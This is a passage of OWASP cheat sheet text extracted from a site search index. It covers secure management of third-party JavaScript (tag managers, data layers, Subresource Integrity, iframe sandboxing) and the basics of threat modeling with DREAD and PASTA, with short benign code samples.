A typical case is the current situation with major news/press sites that invoke third-party code (typically for ad engines, statistics and JavaScript APIs): any user visiting any of these websites also informs the 3rd parties of the visit. In many cases, the third-party also gets to know what news articles each individual user is clicking specifically (leakage occurs through the HTTP referrer field) and thus can establish deeper personality profiles.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent leakage of HTTP requests to 3rd parties). Users can reduce their profiling by randomly clicking links on leaking websites/applications (such as press/news websites). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#third-party-javascript-deployment-architectures","title":"Third-party JavaScript Deployment Architectures","text":"

There are three basic deployment mechanisms for tags. These mechanisms can be combined with each other.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-javascript-on-page","title":"Vendor JavaScript on page","text":"

This is where the vendor provides the host with the JavaScript and the host puts it on the host page. To be secure the host company must review the code for any vulnerabilities like XSS attacks or malicious actions such as sending sensitive data from the DOM to a malicious site. This is often difficult because the JavaScript is commonly obfuscated.

<!-- Some host, e.g. foobar.com, HTML code here -->\n<html>\n    <head></head>\n    <body>\n        ...\n        <script type=\"text/javascript\">/* 3rd party vendor javascript here */</script>\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#javascript-request-to-vendor","title":"JavaScript Request to Vendor","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL directly from the vendor site. When the host page is being created, the developer includes the lines of code provided by the vendor that will request the vendor JavaScript. Each time the page is accessed, the requests are made to the vendor site for the JavaScript, which then executes in the user's browser.

<!-- Some host, e.g. foobar.com, HTML code here -->\n<html>\n    <head></head>\n    <body>\n        ...\n        <!-- 3rd party vendor javascript -->\n        <script src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n        <!-- /3rd party vendor javascript -->\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-request-to-vendor-through-tag-manager","title":"Indirect request to Vendor through Tag Manager","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL from a tag aggregator or tag manager site, not from the JavaScript vendor site. The tag aggregator or tag manager site returns whatever third-party JavaScript files the host company has configured to be returned. Each file or URL request to the tag manager site can return lots of other JavaScript files from multiple vendors.

The actual content that is returned from the aggregator or manager (i.e. the specific JavaScript files as well as exactly what they do) can be dynamically changed by host site employees using a graphical development user interface hosted on the tag manager site, which non-technical users, such as the marketing part of the business, can work with.

The changes can be either:

  1. Getting a different JavaScript file from the third-party vendor for the same request.
  2. Changing what DOM object data is read, and when, to send it to the vendor.

The tag manager developer user interface will generate code that does what the marketing functionality requires, basically determining what data to get from the browser DOM and when to get it. The tag manager always returns a container JavaScript file to the browser, which is essentially a set of JavaScript functions that are used by the code generated by the user interface to implement the required functionality.

Similar to Java frameworks that provide functions and global data to the developer, the container JavaScript executes in the browser and lets the business user use the tag manager developer user interface to specify high-level functionality without needing to know JavaScript.

<!-- Some host, e.g. foobar.com, HTML code here -->\n<html>\n    <head></head>\n    <body>\n        ...\n        <!-- Tag Manager -->\n        <script>(function(w, d, s, l, i){\nw[l] = w[l] || [];\nw[l].push({'tm.start':new Date().getTime(), event:'tm.js'});\nvar f = d.getElementsByTagName(s)[0],\nj = d.createElement(s),\ndl = l != 'dataLayer' ? '&l=' + l : '';\nj.async=true;\nj.src='https://tagmanager.com/tm.js?id=' + i + dl;\nf.parentNode.insertBefore(j, f);\n})(window, document, 'script', 'dataLayer', 'TM-FOOBARID');</script>\n        <!-- /Tag Manager -->\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-problems-with-requesting-tags","title":"Security Problems with requesting Tags","text":"

The previously described mechanisms are difficult to make secure because you can only see the code if you proxy the requests or if you get access to the GUI and see what is configured. The JavaScript is generally obfuscated, so even seeing it is usually not useful. It is also instantly deployable, because each new page request from a browser executes the requests to the aggregator, which gets the JavaScript from the third-party vendor. So as soon as any JavaScript files are changed on the vendor site, or modified on the aggregator, the next call for them from any browser will get the changed JavaScript. One way to manage this risk is with the Subresource Integrity standard described below.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer","title":"Server Direct Data Layer","text":"

The tag manager developer user interface can be used to create JavaScript that can get data from anywhere in the browser DOM and store it anywhere on the page. This can allow vulnerabilities because the interface can be used to generate code to get unvalidated data from the DOM (e.g. URL parameters) and store it in some page location that would execute JavaScript.

The best way to make the generated code secure is to confine it to getting DOM data from a host defined data layer.

The data layer is either:

  1. a DIV object with attribute values that have the marketing or user behavior data that the third party wants, or
  2. a set of JSON objects with the same data.

Each variable or attribute contains the value of some DOM element or the description of a user action. The data layer is the complete set of values that all vendors need for that page. The data layer is created by the host developers.

When specific events happen that the business has defined, a JavaScript handler for that event sends values from the data layer directly to the tag manager server. The tag manager server then sends the data to whatever third party or parties are supposed to get it. The event handler code is created by the host developers using the tag manager developer user interface. The event handler code is loaded from the tag manager servers on every page load.
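
The following is a minimal sketch of this pattern (the data layer fields, the button id and the tag manager collection URL are illustrative assumptions):

// Host-defined data layer, populated by first-party code on page load.\nwindow.dataLayer = {\n  pageCategory: 'city-guide',\n  pageCity: 'Lisbon',\n  userSegment: 'returning'\n};\n\n// First-party event handler: sends only data layer values to the tag manager.\ndocument.getElementById('book-button').addEventListener('click', () => {\n  const payload = {\n    event: 'booking_click',\n    city: window.dataLayer.pageCity,\n    segment: window.dataLayer.userSegment\n  };\n  navigator.sendBeacon('https://tagmanager.example/collect', JSON.stringify(payload));\n});\n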

This is a secure technique because only your JavaScript executes in your users' browsers, and only the data you decide on is sent to the vendor.

This requires cooperation between the host, the aggregator or tag manager and the vendors.

The host developers have to work with the vendor in order to know what type of data the vendor needs to do their analysis. Then the host programmer determines what DOM element will have that data.

The host developers have to work with the tag manager or aggregator to agree on the protocol to send the data to the aggregator: what URL, parameters, format etc.

The tag manager or aggregator has to work with the vendor to agree on the protocol to send the data to the vendor: what URL, parameters, format etc. Does the vendor have an API?

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-defense-considerations","title":"Security Defense Considerations","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer_1","title":"Server Direct Data Layer","text":"

The server direct mechanism is a good security standard for third party JavaScript management, deployment and execution. A good practice for the host page is to create a data layer of DOM objects.

The data layer can perform any validation of the values, especially values from DOM objects exposed to the user like URL parameters and input fields, if these are required for the marketing analysis.

An example statement for a corporate standard document is: 'The tag JavaScript can only access values in the host data layer. The tag JavaScript can never access a URL parameter.'

You, the host page developer, have to agree with the third-party vendors or the tag manager on which attribute in the data layer will have which value, so they can create the JavaScript to read that value.

User interface tags cannot be made secure using the data layer architecture because their function (or one of their functions) is to change the user interface on the client, not to send data about the user actions.

Analytics tags can be made secure using the data layer architecture because the only action needed is to send data from the data layer to the third party. Only first-party code is executed: first to populate the data layer (generally on page load), then event handler JavaScript sends whatever data is needed from that page to the third-party database or tag manager.

This is also a very scalable solution. Large ecommerce sites can easily have hundreds of thousands of URL and parameter combinations, with different sets of URLs and parameters being included in different marketing analysis campaigns. The marketing logic could have 30 or 40 different vendor tags on a single page.

For example, user actions in pages about specified cities, from specified locations on specified days, should send data layer elements 1, 2 and 3. User actions in pages about other cities should send data layer elements 2 and 3 only. Since the event handler code to send data layer data on each page is controlled by the host developers or marketing technologists using the tag manager developer interface, the business logic about when and which data layer elements are sent to the tag manager server can be changed and deployed in minutes. No interaction is needed with the third parties; they continue getting the data they expect, but now it comes from different contexts that the host marketing technologists have chosen.

Changing third-party vendors just means changing the data dissemination rules at the tag manager server; no changes are needed in the host code. The data also goes directly only to the tag manager, so the execution is fast. The event handler JavaScript does not have to connect to multiple third-party sites.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-requests","title":"Indirect Requests","text":"

For indirect requests to tag manager/aggregator sites that offer the GUI to configure the JavaScript, they may also implement:

The host company should also verify the security practices of the tag manager site, such as access controls to the tag configuration for the host company, which can also include two-factor authentication.

Letting the marketing folks decide where to get the data they want can result in XSS because they may get it from a URL parameter and put it into a variable that is in a scriptable location on the page.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-content","title":"Sandboxing Content","text":"

Both of these tools can be used by sites to sandbox/clean DOM data.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity","title":"Subresource Integrity","text":"

Subresource Integrity will ensure that only the code that has been reviewed is executed. The developer generates integrity metadata for the vendor JavaScript and adds it to the script element like this:

<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"\nintegrity=\"sha384-MBO5IDfYaE6c6Aao94oZrIOiC7CGiSNE64QUbHNPhzk8Xhm0djE6QqTpL0HzTUxk\"\ncrossorigin=\"anonymous\">\n</script>\n

It is important to know that in order for SRI to work, the vendor host needs CORS enabled. It is also a good idea to monitor the vendor JavaScript for changes on a regular basis, because if the vendor updates its code, the integrity check will fail and you can end up with secure but non-working third-party code.
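
As an illustration, the integrity value can be generated from a locally reviewed copy of the vendor script, for example with a small Node.js snippet (openssl or shasum based tooling works just as well; the file name is an assumption):

const crypto = require('crypto');\nconst fs = require('fs');\n\n// Compute the sha384 digest of the reviewed script and encode it as required by SRI.\nconst body = fs.readFileSync('script.js');\nconst integrity = 'sha384-' + crypto.createHash('sha384').update(body).digest('base64');\nconsole.log(integrity); // paste into the script tag's integrity attribute\n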

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#keeping-javascript-libraries-updated","title":"Keeping JavaScript libraries updated","text":"

OWASP Top 10 2013 A9 describes the problem of using components with known vulnerabilities. This includes JavaScript libraries. JavaScript libraries must be kept up to date, as previous versions can have known vulnerabilities which typically leave the site vulnerable to Cross-Site Scripting. There are several tools out there that can help identify such libraries. One such tool is the free open source tool RetireJS.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-with-iframe","title":"Sandboxing with iframe","text":"

You can also put vendor JavaScript into an iframe served from a different domain (e.g. a static data host). It will work as a \"jail\" and the vendor JavaScript will not have direct access to the host page DOM and cookies.

The host main page and sandbox iframe can communicate between each other via the postMessage mechanism.

Also, iframes can be secured with the iframe sandbox attribute.

For high risk applications, consider the use of Content Security Policy (CSP) in addition to iframe sandboxing. CSP makes hardening against XSS even stronger.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0somehost.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Include\u00a0iframe\u00a0with\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<iframe\n       src=\"https://somehost-static.net/analytics.html\"\n       sandbox=\"allow-same-origin\u00a0allow-scripts\">\n       </iframe>\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n\n<!--\u00a0somehost-static.net/analytics.html\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>\nwindow.addEventListener(\"message\",\u00a0receiveMessage,\u00a0false);\nfunction\u00a0receiveMessage(event)\u00a0{\nif\u00a0(event.origin\u00a0!==\u00a0\"https://somehost.com:443\")\u00a0{\nreturn;\n}\u00a0else\u00a0{\n//\u00a0Make\u00a0some\u00a0DOM\u00a0here\u00a0and\u00a0initialize\u00a0other\n//data\u00a0required\u00a0for\u00a03rd\u00a0party\u00a0code\n}\n}\n</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#virtual-iframe-containment","title":"Virtual iframe Containment","text":"

This technique creates iFrames that run asynchronously in relation to the main page. It also provides its own containment JavaScript that automates the dynamic implementation of the protected iFrames based on the marketing tag requirements.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-agreements","title":"Vendor Agreements","text":"

The agreement or request for proposal with the 3rd parties can require evidence that they have implemented secure coding and general corporate server access security. But in particular, you need to determine the monitoring and control of their source code in order to prevent and detect malicious changes to that JavaScript.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#martechsec","title":"MarTechSec","text":"

Marketing Technology Security

This refers to all aspects of reducing the risk from marketing JavaScript. Controls include:

  1. Contractual controls for risk reduction: the contracts with any MarTech company should include a requirement to show evidence of code security and code integrity monitoring.
  2. Contractual controls for risk transference: the contracts with any MarTech company could include a penalty for serving malicious JavaScript.
  3. Technical controls for malicious JavaScript execution prevention: Virtual Iframes.
  4. Technical controls for malicious JavaScript identification: Subresource Integrity.
  5. Technical controls: including client-side JavaScript malicious behavior in penetration testing requirements.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#marsecops","title":"MarSecOps","text":"

Marketing Security Operations

This refers to the operational requirements to maintain some of the technical controls. This involves possible cooperation and information exchange between the marketing team, the MarTech provider and the run or operations team to update the information in the page controls (SRI hash changes, changes in pages with SRI), the policies in the Virtual iFrames, tag manager configuration, data layer changes, etc.

The most complete and preventive controls for any site containing non-trivial marketing tags are:

  1. A data layer that calls the marketing server or tag manager APIs, so that only your code executes on your page (inversion of control).

  2. Subresource Integrity.

  3. Virtual iframe Containment.

The MarSecOps requirements to implement technical controls at the speed of change that marketing wants, or the lack of a significant number of dedicated resources, can make data layer and Subresource Integrity controls impractical.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html","title":"Threat Modeling Cheat Sheet","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Threat modeling is a structured approach of identifying and prioritizing potential threats to a system, and determining the value that potential mitigations would have in reducing or neutralizing those threats. This cheat sheet aims to provide guidance on how to create threat models for both existing systems or applications as well as new systems.

You do not need to be a security expert in order to implement the techniques covered in this cheat sheet. All developers, software and system designers, and architects should strive to include threat modeling in their software development life cycle. Optimally, you will create your threat models and determine which mitigations are needed during an early stage of the development of a new system, application, or feature. Assessing potential threats during the design phase of your project can save significant resources that might be needed to refactor the project to include risk mitigations during a later phase of the project.

When you produce a threat model, you will:

Note that throughout the document, the terms \"systems\" and \"applications\" are used interchangeably. The principles in the document apply equally to designing and building systems such as network infrastructures or server clusters as they do to designing or developing desktop, mobile, or web applications.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#threat-modeling-terminology","title":"Threat Modeling Terminology","text":"

You should be familiar with the following terms that will be used throughout this cheat sheet.

A threat agent is an individual or group that is capable of carrying out a particular threat. It is fundamental to identify who would want to exploit the assets of a company, how they might use them against the company, and if they would be capable of doing so. Some threats require more expertise or resources, and thus raise the level of threat actor needed. For example, if a threat requires hundreds of thousands of dollars of computing power to implement, it is likely that only organized corporate, criminal, or government actors would be valid threat actors for such a threat. However, with the rise of cloud computing and the prevalence of attack software on the internet, other threats may be easy to implement with relatively little skill and few resources.

Impact is a measure of the potential damage caused by a particular threat. Impact and damage can take a variety of forms. A threat may result in damage to physical assets, or may result in obvious financial loss. Indirect loss may also result from an attack, and needs to be considered as part of the impact. For example, if your company's website were defaced this could cause damage to your company's reputation, which may in turn cause a loss of business because of the loss of confidence by your users. Depending on the business you are in, attacks that expose user information could potentially result in a physical threat of harm or loss of life to your users, greatly raising the impact of threats that would allow such exposure.

Likelihood is a measure of the possibility of a threat being carried out. A variety of factors can impact the likelihood of a threat being carried out, including how difficult the implementation of the threat is, and how rewarding it would be to the attacker. For example, if a threat required a skilled threat actor with tens of thousands of dollars of computing resources to implement, and the only reward was that they were able to gain access to information that is already public in some other form, the likelihood is low. However, if the threat is relatively easy to accomplish, or if the attacker were to gain valuable information from which they could profit, the likelihood may be higher.

Controls are safeguards or countermeasures that you put in place in order to avoid, detect, counteract, or minimize potential threats against your information, systems, or other assets.

Preventions are controls that may completely prevent a particular attack from being possible. For example, if you identify a threat that your users' personal information may be identified by certain application logging, and you decide to completely remove that logging, you have prevented that particular threat.

Mitigations are controls that are put in place to reduce either the likelihood or the impact of a threat, while not necessarily completely preventing it. For example, if you store your users' passwords as hashes in a database, two users who have the same password will have the same hash. Thus, if an attacker has access to the hashed passwords and is able to determine the password associated with one hash, they are easily able to find all the other users who share the same password simply by looking for the same hash. However, if you add salts to each user's password, the cost of this particular attack is greatly increased, as the attacker must crack each password individually. An increase in cost reduces the likelihood, and thus has mitigated the attack.

A data flow diagram is a depiction of how information flows through your system. It shows each place that data is input into or output from each process or subsystem. It includes anywhere that data is stored in the system, either temporarily or long-term.

A trust boundary (in the context of threat modeling) is a location on the data flow diagram where data changes its level of trust. Any place where data is passed between two processes is typically a trust boundary. If your application reads a file from disk, there's a trust boundary between the application and the file because outside processes and users can modify the data in the file. If your application makes a call to a remote process, or a remote process makes calls to your application, that's a trust boundary. If you read data from a database, there's typically a trust boundary because other processes can modify the data in the database. Any place you accept user input in any form is always a trust boundary.

In addition to the above terminologies, it is important to be familiar with the key threat modeling principles defined in the Threat Modeling Manifesto project. Those principles are considered throughout the following steps in this cheat sheet.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#getting-started","title":"Getting Started","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-business-objectives","title":"Define Business Objectives","text":"

Before starting the threat modeling process it is important to identify business objectives of the applications you are assessing, and to identify security and compliance requirements that may be necessary due to business or government regulation. Having these objectives and requirements in mind before the threat assessment begins will help you to evaluate the impact of any threat you find during the risk analysis process.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-application-design","title":"Identify application design","text":"

Early in the threat modeling process, you will need to draw a data flow diagram of the entire system that is being assessed, including its trust boundaries. Thus, understanding the design of the application is key to performing threat modeling. Even if you are very familiar with the application design, you may identify additional data flows and trust boundaries throughout the threat modeling process.

A thorough understanding of how the system is designed will also help you assess the likelihood and potential impact of any particular threat that you identify.

When you are assessing an existing system that has existing design documentation, spend time reviewing that documentation. The documentation may be out of date, requiring you to gather new information to update it. Or, there may be no documentation at all, requiring you to create the design documents.

In the optimal case, you are performing your assessment during the design phase of the project, and the design documentation will be up-to-date and available. In any event, this cheat sheet outlines steps you can take to create design documents if they are needed.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-design-documents","title":"Create design documents","text":"

There are many ways to generate design documents; the 4+1 view model is one of the mature approaches to building your design document.

Reference to 4+1 view model of architecture here.

Please note that while the 4+1 view model is comprehensive, you may use any other design model during this phase.

The following subsections show the details of the 4+1 approach and how it can help in the threat modeling process:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#logical-view","title":"Logical View","text":"

Create a logical map of the Target of Evaluation.

Audience: Designers.

Area: Functional Requirements: describes the design's object model.

Related Artifacts: Design model

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#implementation-view","title":"Implementation View","text":"

Audience: Programmers.

Area: Software components: describes the layers and subsystems of the application.

Related Artifacts: Implementation model, components

Please refer to the image in the appendix section for sample design for the implementation view.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#process-view","title":"Process View","text":"

Audience: Integrators.

Area: Non-functional requirements: describes the design's concurrency and synchronization aspects.

Related Artifacts: (no specific artifact).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#deployment-view","title":"Deployment View","text":"

Create a physical map of the Target of Evaluation

Audience: Deployment managers.

Area: Topology: describes the mapping of the software onto the hardware and shows the system's distributed aspects.

Related Artifacts: Deployment model.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-case-view","title":"Use-Case View","text":"

Audience: All the stakeholders of the system, including the end users.

Area: describes the set of scenarios and/or use cases that represent some significant, central functionality of the system.

Related Artifacts: Use-Case Model, Use-Case documents

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#decompose-and-model-the-system","title":"Decompose and Model the System","text":"

To perform a threat model, it is important to gain an understanding of how the system works and interacts with its ecosystem. Start by creating a high-level information flow diagram, like the following:

  1. Identify the trusted boundaries of your system/application/module/ecosystem that you may want to start off with.
  2. Add actors \u2013 internal and external.
  3. Define internal trusted boundaries. These can be the different security zones that have been designed.
  4. Review the actors you identified in step 2 for consistency.
  5. Add information flows.
  6. Identify the information elements and their classification as per your information classification policy.
  7. Where possible, add assets to the identified information flows.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-and-evaluate-your-assets","title":"Define and Evaluate your Assets","text":"

Assets involved in the information flow should be defined and evaluated according to their value of confidentiality, integrity and availability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#consider-data-in-transit-and-data-at-rest","title":"Consider Data in transit and Data at rest","text":"

Data protection in transit is the protection of this data while it\u2019s travelling from network to network or being transferred from a local storage device to a cloud storage device \u2013 wherever data is moving, effective data protection measures for in-transit data are critical as data is often considered less secure while in motion.

While data at rest is sometimes considered to be less vulnerable than data in transit, attackers often find data at rest a more valuable target than data in motion.

The risk profile for data in transit or data at rest depends on the security measures that are in place to secure data in either state. Protecting sensitive data both in transit and at rest is imperative for modern enterprises as attackers find increasingly innovative ways to compromise systems and steal data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-an-information-flow-diagram","title":"Create an information flow diagram","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#whiteboard-your-architecture","title":"Whiteboard Your Architecture","text":"

It is important to whiteboard system architecture by showing the major constraints and decisions in order to frame and start conversations. The value is actually twofold. If the architecture cannot be white-boarded, then it suggests that it is not well understood. If a clear and concise whiteboard diagram can be provided, others will understand it and it will be easier to communicate details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#manage-to-present-your-dfd-in-the-context-of-mvc","title":"Manage to present your DFD in the context of MVC","text":"

In this step, Data Flow Diagram should be divided in the context of Model, View, Controller (MVC).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-tools-to-draw-your-diagram","title":"Use tools to draw your diagram","text":"

If you don\u2019t like to manually draw your DFD, there are several tools available that can be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-threat-dragon","title":"OWASP Threat Dragon","text":"

The OWASP Threat Dragon project is a cross platform tool that runs on Linux, macOS and Windows 10. Threat Dragon (TD) is used to create threat model diagrams and to record possible threats and decide on their mitigations using STRIDE methodology. TD is both a web application and a desktop application; refer to the project's GitHub repository for the latest release.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#poirot","title":"Poirot","text":"

The Poirot tool isolates and diagnoses defects through fault modeling and simulation. Along with a carefully selected partitioning strategy, functional and sequential test pattern applications show success with circuits having a high degree of observability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#ms-tmt","title":"MS TMT","text":"

The Microsoft Threat Modeling Tool (TMT) helps find threats in the design phase of software projects. It is one of the longest lived threat modeling tools, having been introduced as Microsoft SDL in 2008, and is actively supported; version 7.3 was released March 2020. It runs only on Windows 10 Anniversary Update or later, and so is difficult to use on macOS or Linux.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-pytm","title":"OWASP pytm","text":"

Pytm is a Python library to help you describe your system in terms of objects and attributes, able to generate a DFD in Graphviz (dot) format, a sequence diagram in plantuml format, and a list of threats (out of CAPEC and other threat libraries) to the system in a templated format. As of 2023 it is under active development. No Python knowledge is necessary for its use - if you can define objects and use .attribute notation, you should be able to use it.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-data-flow-over-your-dfd","title":"Define Data Flow over your DFD","text":"

Define Data Flows over the organization Data Flow Diagram.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-trust-boundaries","title":"Define Trust Boundaries","text":"

Define any distinct boundaries (External boundaries and Internal boundaries) within which a system trusts all sub-systems (including data).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-applications-user-roles-and-trust-levels","title":"Define applications user roles and trust levels","text":"

Define access rights that the application will grant to external entities and internal entities.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#highlight-authorization-per-user-role-over-the-dfd","title":"Highlight Authorization per user role over the DFD","text":"

Highlight Authorization per user role, for example, defining the app users\u2019 role, admins\u2019 role, anonymous visitors\u2019 role, etc.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-application-entry-points","title":"Define Application Entry points","text":"

Define the interfaces through which potential attackers can interact with the application or supply them with data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-threat-agents","title":"Identify Threat Agents","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-all-possible-threats","title":"Define all possible threats","text":"

Identify possible attackers (threat agents) that could exist within the Target of Evaluation. Use Means, Motive, and Opportunity to understand the threats posed by attackers. Then associate threat agents with the system components they can directly interact with.

Work on minimizing the number of threat agents by:

The user of this cheat sheet can rely on the following list of risk and threat library sources to define the possible threats an application might be facing:

  1. Risks with OWASP Top 10.
  2. Testing Procedure with OWASP ASVS.
  3. Risks with SANS Top 25.
  4. Microsoft STRIDE.
  5. Continuous Threat Modeling CTM.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#map-threat-agents-to-application-entry-points","title":"Map Threat agents to application Entry points","text":"

Map threat agents to the application entry points, whether it is a login process, a registration process or whatever else it might be, and consider insider threats.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#draw-attack-vectors-and-attacks-tree","title":"Draw attack vectors and attacks tree","text":"

During this phase conduct the following activities:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#mapping-abuse-cases-to-use-cases","title":"Mapping Abuse Cases to Use Cases","text":"

This is a very important step that can help identify application logical threats. A list of all possible abuse cases should be developed for each application use case. Being familiar with the types of application logical attacks is important during the mapping process. You can refer to OWASP Testing Guide 4.0: Business Logic Testing and OWASP ASVS for more details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#re-define-attack-vectors","title":"Re-Define attack vectors","text":"

In most cases, after defining the attack vectors, a compromised user role could lead to further attacks against the application. For example, assuming that an internet banking user's credentials could be compromised, the user of this cheat sheet then has to redefine the attack vectors that could result from compromising those credentials, and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#write-your-threat-traceability-matrix","title":"Write your Threat traceability matrix","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-the-impact-and-probability-for-each-threat","title":"Define the Impact and Probability for each threat","text":"

Enumerate Attacks posed by the most dangerous attacker in designated areas of the logical and physical maps of the target of evaluation.

Assume the attacker has a zero-day, because they do. In this methodology, we assume compromise, because a zero-day either will exist or already does exist (even if we don't know about it). This is about what can be done by skilled attackers with far more time, money, motive, and opportunity than we have.

Use a risk management methodology to determine the risk behind each threat.

Create an entry in the risk log for every identified threat or attack against any asset. A risk assessment methodology is followed in order to identify the risk level for each vulnerability and, hence, for each server.

Here we highlight two risk methodologies that could be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#dread","title":"DREAD","text":"

DREAD is about evaluating each existing vulnerability using a mathematical formula to derive the vulnerability's corresponding risk. The DREAD formula is divided into 5 main categories:

DREAD formula is:

Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability).

Then the risk level is determined using defined thresholds below.
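
As a small worked example of the formula above (the 0-10 scale per category and the scores themselves are illustrative assumptions, not prescribed values):

def dread_risk(damage, affected_users, reproducibility, exploitability, discoverability):
    # Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability)
    return (damage + affected_users) * (reproducibility + exploitability + discoverability)

# Hypothetical SQL injection in an internet-facing form, each category scored 0-10
print(dread_risk(damage=8, affected_users=9, reproducibility=7, exploitability=6, discoverability=8))
# (8 + 9) * (7 + 6 + 8) = 357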

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#pasta","title":"PASTA","text":"

PASTA (Process for Attack Simulation and Threat Analysis) is a complete methodology for performing application threat modeling. PASTA introduces a risk-centric methodology aimed at applying security countermeasures that are commensurate with the possible impact that could be sustained from defined threat models, vulnerabilities, weaknesses, and attack patterns.

PASTA introduces complete risk analysis and evaluation procedures that you can follow to evaluate the risk for each of the identified threats. The main difference of the PASTA approach is that the impact is evaluated early on, in the analysis phase, instead of being addressed only at the risk evaluation step.

The idea behind addressing the impact earlier in the PASTA approach is that the audience that owns the impact understands the consequences of product or use case failures better than the participants in the threat analysis phase.

Application security risk assessments are not enough on their own, because they are very binary and rely on a control framework for denoting risks. It is recommended to contextually look at threat impacts, probability, and the effectiveness of any countermeasures that may be present.

R = (TVP*I) / Countermeasures

For more details about PASTA.

